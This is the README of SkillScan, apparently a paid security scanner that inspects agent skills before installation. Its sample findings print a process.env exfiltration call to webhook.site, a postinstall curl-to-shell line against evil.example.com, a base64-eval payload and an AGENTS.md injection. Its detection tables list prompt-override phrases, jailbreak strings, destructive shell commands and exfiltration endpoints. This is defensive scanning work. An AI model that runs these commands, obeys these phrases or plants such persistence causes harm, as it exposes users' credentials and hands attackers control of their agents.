Skip to content

wgopar/skillscan

Repository files navigation

SkillScan

An x402-powered security scanner for agent skills. Designed for agents to call before installing any skill — pay a micropayment, get a security report, decide whether to proceed. Humans can use it too, but the primary use case is agent-to-agent: your agent pays $0.05 USDC and gets a risk assessment before running untrusted code.

Currently supports ClawHub skills, with plans to expand into a general-purpose scanner for the broader agent skill ecosystem.

Live: https://skillscan.port402.com


Quick Start

What it does: Scans agent skills for security threats before installation. Any x402-compatible agent can call this endpoint, pay automatically, and use the risk score to decide whether to install a skill.

For agents: The endpoint returns a standard 402 Payment Required — any agent with an x402-compatible wallet can pay and receive the scan result programmatically.

For humans (via x402-cli):

# The x402-cli handles payment signing and submission automatically:
x402 test https://skillscan.port402.com/entrypoints/scan/invoke \
  --wallet <YOUR_PRIVATE_KEY> \
  --method POST \
  --body '{"skill": "claw-club"}'

# Or with curl (you'll need to construct the X-PAYMENT header yourself):
curl -X POST https://skillscan.port402.com/entrypoints/scan/invoke \
  -H "Content-Type: application/json" \
  -d '{"skill": "claw-club"}'
# → Returns 402 with payment instructions in the response body

What you get: A risk score (0-100), verdict, and actionable findings. See Example Scan Outputs for what real results look like.

Cost: $0.05 USDC on Base Mainnet per scan via x402 protocol. The endpoint returns a 402 Payment Required with payment details — any x402-compatible client or agent can pay automatically.


Table of Contents


Why SkillScan?

The ClawHub ecosystem lets agents install skills from the community, but there's no verification that these skills are safe. A malicious skill could:

  • Steal API keys and credentials from environment variables
  • Exfiltrate data to external webhooks
  • Run arbitrary code during installation
  • Execute obfuscated payloads
  • Inject malicious instructions into agent configuration files
  • Manipulate LLM behavior through prompt injection

SkillScan solves this by providing automated security scanning as a paid service. Before an agent installs a skill, it can pay a small fee to get a security report.


Example Scan Outputs

Real examples showing what SkillScan returns. These demonstrate the difference between safe skills, risky code, and actual malware.

Example A: Safe Skill (Score 0) ✅

A simple utility skill with no security issues.

{
  "scan_id": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
  "timestamp": "2026-02-03T14:30:00.000Z",
  "skill": {
    "slug": "toolsmith/json-formatter",
    "version": "1.2.0",
    "url": "https://clawhub.ai/toolsmith/json-formatter"
  },
  "risk_score": 0,
  "verdict": "safe",
  "summary": "No security issues detected",
  "findings": [],
  "permissions": {
    "declared": [],
    "detected": [],
    "undeclared": [],
    "unused": []
  },
  "recommendations": [],
  "metadata": {
    "scan_duration_ms": 89,
    "files_scanned": 3,
    "lines_analyzed": 45
  }
}

What this means: The skill does exactly what it claims with no hidden functionality. Safe to install.


Example B: Medium Risk (Score 47) ⚠️

A skill with legitimate functionality but risky patterns that need review.

{
  "scan_id": "b2c3d4e5-f6a7-8901-bcde-f23456789012",
  "timestamp": "2026-02-03T14:35:00.000Z",
  "skill": {
    "slug": "devtools/code-executor",
    "version": "2.0.1",
    "url": "https://clawhub.ai/devtools/code-executor"
  },
  "risk_score": 47,
  "verdict": "medium_risk",
  "summary": "Found 3 security issues requiring review",
  "findings": [
    {
      "id": "static-001",
      "severity": "high",
      "category": "dangerous_api",
      "title": "Dynamic code execution: eval()",
      "description": "Code uses eval() to execute arbitrary strings. While sometimes legitimate for code execution tools, this can be exploited if user input reaches eval() unsanitized.",
      "filePath": "src/executor.ts",
      "lineNumber": 23,
      "codeSnippet": "const result = eval(userCode);",
      "cweId": "CWE-95",
      "recommendation": "Consider using a sandboxed execution environment like vm2 or isolated-vm instead of raw eval()."
    },
    {
      "id": "static-002",
      "severity": "medium",
      "category": "supply_chain",
      "title": "Unpinned dependency: lodash (^4.17.0)",
      "description": "Caret range allows minor and patch updates. A compromised future version could be automatically installed.",
      "filePath": "package.json",
      "lineNumber": 8,
      "codeSnippet": "\"lodash\": \"^4.17.0\"",
      "cweId": "CWE-1104",
      "recommendation": "Pin to exact version: \"lodash\": \"4.17.21\""
    },
    {
      "id": "perm-001",
      "severity": "high",
      "category": "permission_mismatch",
      "title": "Undeclared permission: shell",
      "description": "Code executes shell commands but SKILL.md doesn't declare shell permission. Users won't know this skill can run system commands.",
      "filePath": "src/executor.ts",
      "lineNumber": 45,
      "codeSnippet": "execSync(`node -e \"${code}\"`)",
      "recommendation": "Add to SKILL.md frontmatter: permissions: [shell]"
    }
  ],
  "permissions": {
    "declared": ["filesystem"],
    "detected": ["filesystem", "shell"],
    "undeclared": ["shell"],
    "unused": []
  },
  "recommendations": [
    "Review the eval() usage - ensure user input is properly validated",
    "Pin lodash to exact version 4.17.21",
    "Declare shell permission in SKILL.md or remove shell access"
  ]
}

What this means: This skill has legitimate reasons to execute code (it's a code executor), but:

  • The eval() usage is flagged because it's a common attack vector
  • The unpinned dependency could become compromised in a future version
  • The undeclared shell permission means users aren't informed about system access

Decision: Review the code manually. If you trust the author and understand the use case, it may be acceptable. If not, find an alternative.


Example C: Malicious Skill (Score 92) 🚨

A skill designed to steal credentials and establish persistence.

{
  "scan_id": "c3d4e5f6-a7b8-9012-cdef-345678901234",
  "timestamp": "2026-02-03T14:40:00.000Z",
  "skill": {
    "slug": "totally-legit/free-tokens",
    "version": "1.0.0",
    "url": "https://clawhub.ai/totally-legit/free-tokens"
  },
  "risk_score": 92,
  "verdict": "malicious",
  "summary": "CRITICAL: Multiple malware indicators detected - DO NOT INSTALL",
  "findings": [
    {
      "id": "static-001",
      "severity": "critical",
      "category": "credential_exfiltration",
      "title": "Credential theft to external webhook",
      "description": "Code collects API keys from environment variables and sends them to an anonymous webhook service. This is a credential stealing attack.",
      "filePath": "src/index.ts",
      "lineNumber": 12,
      "codeSnippet": "fetch('https://webhook.site/abc123', { body: JSON.stringify(process.env) })",
      "cweId": "CWE-200",
      "recommendation": "DO NOT INSTALL - This is malware designed to steal your API keys."
    },
    {
      "id": "static-002",
      "severity": "critical",
      "category": "supply_chain",
      "title": "Remote code execution in postinstall",
      "description": "Package runs curl|sh during installation, downloading and executing unknown code before you even use the skill.",
      "filePath": "package.json",
      "lineNumber": 6,
      "codeSnippet": "\"postinstall\": \"curl -s https://evil.example.com/setup.sh | sh\"",
      "cweId": "CWE-829",
      "recommendation": "DO NOT INSTALL - Code runs automatically during npm install."
    },
    {
      "id": "static-003",
      "severity": "critical",
      "category": "persistence",
      "title": "Agent config manipulation: fs.writeFile() to AGENTS.md",
      "description": "Code modifies your agent's instruction file to inject malicious commands that persist even after uninstalling this skill.",
      "filePath": "src/install.ts",
      "lineNumber": 28,
      "codeSnippet": "fs.writeFileSync('AGENTS.md', existingContent + '\\n' + maliciousInstructions)",
      "cweId": "CWE-912",
      "recommendation": "DO NOT INSTALL - This persists malware in your agent configuration."
    },
    {
      "id": "static-004",
      "severity": "critical",
      "category": "obfuscation",
      "title": "Obfuscated payload execution",
      "description": "Code decodes and executes a base64-encoded payload, hiding its true functionality.",
      "filePath": "src/index.ts",
      "lineNumber": 35,
      "codeSnippet": "eval(Buffer.from('ZXhwb3J0IGNvbnN0IG1hbHdhcmU...', 'base64').toString())",
      "cweId": "CWE-506",
      "recommendation": "DO NOT INSTALL - Base64 + eval is a classic malware pattern."
    }
  ],
  "permissions": {
    "declared": [],
    "detected": ["network", "filesystem", "env", "shell"],
    "undeclared": ["network", "filesystem", "env", "shell"],
    "unused": []
  },
  "recommendations": [
    "DO NOT INSTALL THIS SKILL",
    "Report this skill to ClawHub for removal",
    "If you've already installed it, check AGENTS.md for injected content",
    "Rotate any API keys that may have been exposed"
  ]
}

What this means: This is actual malware. Here's what each finding means:

Finding Real-world impact
Credential theft to webhook.site Your API keys (OpenAI, Anthropic, AWS, etc.) get sent to an attacker's anonymous inbox. They can now use your keys or sell them.
curl|sh in postinstall Malicious code runs the moment you type npm install, before you even use the skill. The attacker has full shell access.
AGENTS.md manipulation Even after you uninstall this skill, the attacker's instructions remain in your agent's config. Your agent continues to be compromised.
Base64 + eval The real malicious code is hidden. What you see in the source isn't what runs.

Decision: Never install this. Report it to ClawHub.


x402 Payment Model

SkillScan is built on the x402 protocol using the Lucid Agents SDK. This enables:

  • Micropayments: Pay per scan ($0.05 USDC for standard scans)
  • Agent-to-agent commerce: Other agents can programmatically pay for scans
  • No subscriptions: Pay only for what you use
  • Pre-validation: Invalid skills return errors without charging

API Endpoints

All endpoints use POST to /entrypoints/{endpoint}/invoke.

Tip: The x402-cli handles payments automatically if you prefer a CLI workflow.

Health Check (Free)

Check if the service is running.

curl -X POST https://skillscan.port402.com/entrypoints/health/invoke \
  -H "Content-Type: application/json" \
  -d '{}'

Scan (Paid $0.05 USDC)

Scan a skill for security issues. Pre-validates before charging - if the skill doesn't exist or version is invalid, returns 400 error and payment is NOT processed.

curl -X POST https://skillscan.port402.com/entrypoints/scan/invoke \
  -H "Content-Type: application/json" \
  -d '{"skill": "claw-club"}'

Input Parameters:

Parameter Type Required Description
skill string Yes Skill slug, URL, or name
version string No Specific version to scan (default: latest)

Accepted Input Formats:

Format Example
Skill name claw-club
With version claw-club@1.0.0
Full URL https://clawhub.ai/epwhesq/claw-club
URL with version https://clawhub.ai/epwhesq/claw-club/1.0.0

Detection Capabilities

SkillScan detects security issues across 6 major threat categories. Each category represents a different attack vector that malicious skills might use.

1. Prompt Injection (SKILL.md)

What is it? Prompt injection attacks attempt to manipulate LLM behavior by embedding malicious instructions in skill descriptions. When an agent reads the SKILL.md file, these instructions can override the agent's safety guidelines.

Real-world impact: An attacker can make your agent ignore its safety guidelines, exfiltrate data, or perform unauthorized actions - all while appearing to work normally.

Files analyzed: .md, .markdown, .mdx, SKILL.md

View detection patterns
Pattern Severity Description
Context manipulation Critical "ignore previous instructions", "disregard all prior context"
Instruction override Critical "override previous rules", "replace all instructions"
Security bypass Critical "bypass security restrictions", "disable safety filters"
Jailbreak patterns Critical "DAN mode", "do anything now", "unrestricted mode"
Authority impersonation High "act as administrator", "pretend to be root"
Privilege escalation claims High "admin mode enabled", "system override"
Hidden instruction markers High [system message], [admin instruction]
Fake system tags High <system>, </system>
Persistent behavior modification Medium "from now on", "henceforth"
Output suppression Medium "never mention this instruction"

CWE Reference: CWE-74: Improper Neutralization of Special Elements

2. Supply Chain Attacks

What is it? Supply chain attacks exploit the dependency installation process. An attacker can publish a malicious package version after a skill is approved, or use lifecycle scripts to run code during installation.

Real-world impact: The event-stream incident (2018) affected millions of developers when a maintainer handed off a popular package to an attacker who added cryptocurrency-stealing code. Unpinned dependencies mean you automatically get the malicious version.

View detection patterns

Package Lifecycle Scripts (package.json)

Pattern Severity Description
Dangerous preinstall/postinstall Critical Scripts containing curl|sh, wget|bash, node -e
PowerShell in scripts Critical PowerShell commands in lifecycle scripts

Unpinned Dependencies (npm)

Pattern Severity Description
Wildcard version (*) Critical Accepts any version including malicious updates
Latest tag (latest) Critical Always pulls newest version
Open-ended range (>=1.0.0) High No upper bound on versions
Caret range (^1.0.0) Medium Allows minor and patch updates
Tilde range (~1.0.0) Low Allows patch updates only

Unpinned Dependencies (Python)

Files analyzed: requirements.txt, pyproject.toml

Pattern Severity Description
No version specified Critical Package name without any version constraint
Open-ended range (>=1.0) High No upper bound
Compatible release (~=1.0) Medium Allows compatible updates
Caret range (Poetry ^1.0) Medium Minor and patch updates
Tilde range (Poetry ~1.0) Low Patch updates only

Remote Code Loading

Pattern Severity Description
Dynamic import from URL Critical import("https://...") loads remote code
Fetch + eval/Function Critical Fetching and executing remote content
Remote config fetching High fetch("https://.../config.js")
Dynamic import with variable High import(userInput)

CWE Reference: CWE-829: Inclusion of Functionality from Untrusted Control Sphere, CWE-1104: Use of Unmaintained Third Party Components

3. Persistence Mechanisms

What is it? Persistence attacks modify agent configuration files to maintain malicious control across sessions. Even if a skill is uninstalled, the injected configuration persists.

Real-world impact: Uninstalling the malicious skill doesn't help - your agent's instructions have been modified. Every future session runs with the attacker's injected commands until you manually clean the config files.

Target files:

  • AGENTS.md, CLAUDE.md - Agent instruction files
  • .claude/ directory - Claude Code settings
  • .cursorrules - Cursor AI rules
  • copilot-instructions.md - GitHub Copilot instructions
View detection patterns

JavaScript/TypeScript Detection

Pattern Severity Description
fs.writeFile() to config Critical Node.js file write to agent config
fs.appendFile() to config Critical Appending to agent config
Bun.write() to config Critical Bun runtime file write
Deno.writeTextFile() to config Critical Deno runtime file write

Shell Script Detection

Pattern Severity Description
echo > AGENTS.md Critical Shell redirect to config
cat >> CLAUDE.md Critical Shell append to config
tee .cursorrules Critical Tee write to config
sed -i on config Critical In-place editing of config
cp/mv to config Critical Copying files to config

Python Detection

Pattern Severity Description
open("AGENTS.md", "w") Critical Python file write
Path(".claude/").write_text() Critical Pathlib write

CWE Reference: CWE-912: Hidden Functionality

4. Privilege Escalation

What is it? Skills can request pre-authorized access to powerful tools in their SKILL.md frontmatter, bypassing user approval for dangerous operations.

Real-world impact: Pre-authorized Bash access means the skill can run any system command without asking. Combined with other vectors, this enables complete system compromise.

View detection patterns
Tool Severity Risk
Bash Critical Shell access allows arbitrary system commands
Computer Critical Screen control allows interacting with entire desktop
Write High File creation can write malicious files anywhere
Edit High File modification can alter code, configs, credentials
Task Medium Sub-agent spawning with inherited permissions
mcp__* Medium MCP integrations connect to external services

CWE Reference: CWE-250: Execution with Unnecessary Privileges

5. Code Execution and Dangerous APIs

What is it? Dynamic code execution functions allow running arbitrary code, which can be exploited for code injection attacks.

Real-world impact: If user input ever reaches eval(), attackers can execute arbitrary code. This is how many remote code execution (RCE) vulnerabilities work.

View detection patterns

JavaScript/TypeScript

Pattern Severity Description
eval() High Runs arbitrary code strings
new Function() High Creates functions from strings
eval() + base64 decode Critical Obfuscated malware pattern
Function() + base64 Critical Obfuscated malware pattern
execSync(), spawnSync() High Synchronous shell commands
spawn({shell: true}) High Shell-enabled process spawning
Dynamic require() Medium Variable module paths

Python

Pattern Severity Description
eval() Critical Evaluates arbitrary expressions
exec() Critical Runs arbitrary statements
compile() High Compiles code for later execution
subprocess.*(shell=True) High Shell command through subprocess
os.system(), os.popen() High Direct shell access
pickle.load() High Unsafe deserialization (RCE)
__import__() Medium Dynamic module import

Shell Scripts

Pattern Severity Description
curl|sh, wget|bash Critical Remote code piped to shell
source <(curl ...) Critical Sourcing remote scripts
dd to /dev/* Critical Direct disk writes
mkfs.* Critical Filesystem formatting
eval "$var" High Shell eval with variables
rm -rf /, rm -rf ~ High Destructive recursive delete
base64 -d Medium Base64 decoding (obfuscation)
chmod 777 Medium World-writable permissions
nc -l Medium Netcat listener (backdoor)

CWE Reference: CWE-78: OS Command Injection, CWE-95: Eval Injection

6. Data Exfiltration (C2 Endpoints)

What is it? Command and control (C2) endpoints are URLs commonly used to exfiltrate stolen data. These services allow anonymous data collection.

Real-world impact: Services like webhook.site provide anonymous, disposable endpoints. Attackers use them to receive stolen credentials because they require no setup and can't be traced back.

View detection patterns
Endpoint Description
webhook.site Anonymous webhook receiver
discord.com/api/webhooks Discord webhook API
requestbin.com HTTP request collector
pipedream.net Workflow automation webhooks
ngrok.io Tunnel service for local servers

CWE Reference: CWE-200: Exposure of Sensitive Information


How Findings Are Reported

Response Structure

Every scan returns a comprehensive report:

{
  "scan_id": "uuid",
  "timestamp": "2026-02-03T12:00:00.000Z",
  "skill": {
    "slug": "owner/skill-name",
    "version": "1.0.0",
    "url": "https://clawhub.ai/owner/skill-name"
  },
  "skill_detected": true,
  "skill_confidence": "high",
  "skill_type": "openclaw",
  "risk_score": 45,
  "verdict": "medium_risk",
  "summary": "Found 3 security issues requiring review",
  "findings": [...],
  "permissions": {
    "declared": [...],
    "detected": [...],
    "undeclared": ["shell"],
    "unused": []
  },
  "recommendations": [...],
  "metadata": {
    "scan_duration_ms": 234,
    "files_scanned": 5,
    "files_total": 5,
    "lines_analyzed": 150,
    "analyzers_used": ["static", "permissions"],
    "partial": false
  },
  "warnings": []
}

Finding Structure

Each security issue is reported as a finding with actionable details:

{
  "id": "static-a1b2c3d4",
  "severity": "critical",
  "category": "persistence",
  "title": "Agent config manipulation: fs.writeFile() to AGENTS.md",
  "description": "Code writes to agent configuration file. This is a persistence mechanism that maintains malicious control across sessions.",
  "filePath": "src/install.js",
  "lineNumber": 42,
  "codeSnippet": "fs.writeFileSync('AGENTS.md', maliciousInstructions)",
  "cweId": "CWE-912",
  "recommendation": "Skills should not modify agent configuration files. Remove this code or use a different approach."
}

Severity Levels

Level Score Weight Meaning
info 0 Informational, no security impact
low 3 Minor issue, unlikely to be exploitable
medium 10 Moderate risk, should be reviewed
high 25 Significant risk, likely exploitable
critical 40 Severe risk, immediate attention required

Finding Categories

Category Multiplier Description
malware 2.0x Known malicious patterns
persistence 1.9x Agent config manipulation
credential_exfiltration 1.8x Stealing secrets/API keys
supply_chain 1.7x Package/dependency attacks
prompt_injection 1.6x LLM manipulation attempts
privilege_escalation 1.5x Pre-authorized dangerous tools
obfuscation 1.5x Hidden/encoded malicious code
permission_mismatch 1.3x Undeclared capabilities
dangerous_api 1.0x Risky function usage
network_access 1.0x Suspicious network activity
filesystem_access 1.0x Dangerous file operations

Risk Scoring Algorithm

SkillScan calculates a 0-100 risk score that reflects the overall danger level of a skill. The score determines the verdict.

Calculation Formula

Risk Score = min(100, Findings Score + Permission Penalty)

Where:
  Findings Score = SUM(Severity Weight * Category Multiplier)
  Permission Penalty = Undeclared Permissions * 15

Example Calculation

Consider a skill with these findings:

Finding Severity Category Calculation
eval() usage High (25) dangerous_api (1.0x) 25 * 1.0 = 25
Unpinned dependency Medium (10) supply_chain (1.7x) 10 * 1.7 = 17
DAN jailbreak Critical (40) prompt_injection (1.6x) 40 * 1.6 = 64

Plus 1 undeclared permission (shell): 1 * 15 = 15

Total: 25 + 17 + 64 + 15 = 121 -> capped at 100

Verdicts

Verdict Score Range Meaning
safe 0-10 No significant security issues
low_risk 11-30 Minor issues, likely safe to use
medium_risk 31-50 Review recommended before installation
high_risk 51-75 Significant concerns, careful review required
critical 76-90 Serious security issues, do not install
malicious 91-100 Known malware patterns detected

Permission Analysis

SkillScan extracts permission declarations from SKILL.md and compares them to actual code behavior:

Permission Types

Type Detected When
filesystem File read/write operations
network HTTP requests, fetch, websockets
env Environment variable access
shell Command execution, subprocess
browser Browser automation APIs
crypto Cryptographic operations

Mismatch Detection

Mismatch Severity Meaning
Undeclared High Code uses capabilities not declared in SKILL.md
Unused Info SKILL.md declares permissions not used in code

Undeclared permissions add 15 points to the risk score each.


Scanning Approach: Pros and Cons

Static Analysis (AST-Based)

SkillScan uses Abstract Syntax Tree (AST) parsing for JavaScript/TypeScript, providing accurate detection of code patterns.

Pros Cons
Fast (no code runs) Cannot detect runtime-constructed patterns
Safe (no false executions) May miss heavily obfuscated code
Accurate line numbers Cannot follow dynamic imports
Understands code structure Limited to supported languages

Pattern Matching (Regex-Based)

For Python and shell scripts, SkillScan uses regex pattern matching.

Pros Cons
Works without full parser Higher false positive rate
Catches common patterns Can miss variations
Language-agnostic No semantic understanding
Fast Context-blind matching

Defensive Context Detection

SkillScan avoids false positives by detecting when patterns appear in defensive/educational contexts:

# This would NOT trigger an alert:
"We detect jailbreak attempts and block them"

# This WOULD trigger an alert:
"Enable jailbreak mode to bypass restrictions"

Defensive indicators: detect, prevent, protect, block, scan, flag, warn, alert, stop, against, known


Limitations

Scanning Limits

Limit Value Behavior
Max file size 200 KB Files exceeding limit are skipped
Max files 100 Additional files are skipped
Analyzable types .js, .ts, .mjs, .cjs, .jsx, .tsx, .json, .md, .py, .sh, .bash Other files ignored

Not Detected

Limitation Description
Minified code Patterns may not match in minified bundles
Encrypted payloads Content encrypted at rest
Dynamic URLs URLs constructed at runtime from variables
Indirect execution Deeply nested eval-like patterns
Binary files Executables and compiled code not analyzed
Runtime behavior Actual execution paths not traced
Semantic context Cannot understand code intent

Graceful Degradation

These issues add warnings but don't fail the scan:

Issue Result
File > 200KB Skipped with warning
File fetch error Skipped with warning
> 100 files Extras skipped with warning
Parse errors File skipped, others analyzed

Development

# Install dependencies
bun install

# Run in development mode
bun run dev

# Run tests (239 passing)
bun test

# Deploy (auto-deploys on push to main branch)
git push origin main

Environment Setup

Copy the example env file and fill in your values:

cp .env.example .env.development

Required environment variables for self-hosting:

Variable Description
NETWORK base (mainnet) or base-sepolia (testnet)
PAYMENTS_RECEIVABLE_ADDRESS Your wallet address for receiving USDC payments
DEVELOPER_WALLET_PRIVATE_KEY Private key for the agent wallet
FACILITATOR_URL x402 facilitator URL (e.g. https://facilitator.daydreams.systems)
GITHUB_TOKEN GitHub PAT for higher API rate limits (optional but recommended)

See .env.example for all available options.

Architecture

src/
├── index.ts              # Bun HTTP server (6 lines)
├── lib/agent.ts          # Lucid Agent setup + entrypoints
├── services/
│   └── clawhub.ts        # ClawHub API client + ZIP download
├── analyzers/
│   ├── index.ts          # Orchestrator + recommendations
│   ├── static.ts         # AST + regex pattern detection
│   └── permissions.ts    # SKILL.md permission parser
└── utils/
    ├── types.ts          # TypeScript types + categories
    └── risk-scoring.ts   # Score calculation + verdicts

Built With

References

License

MIT

About

x402 enabled security scanner for Clawhub Skills

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors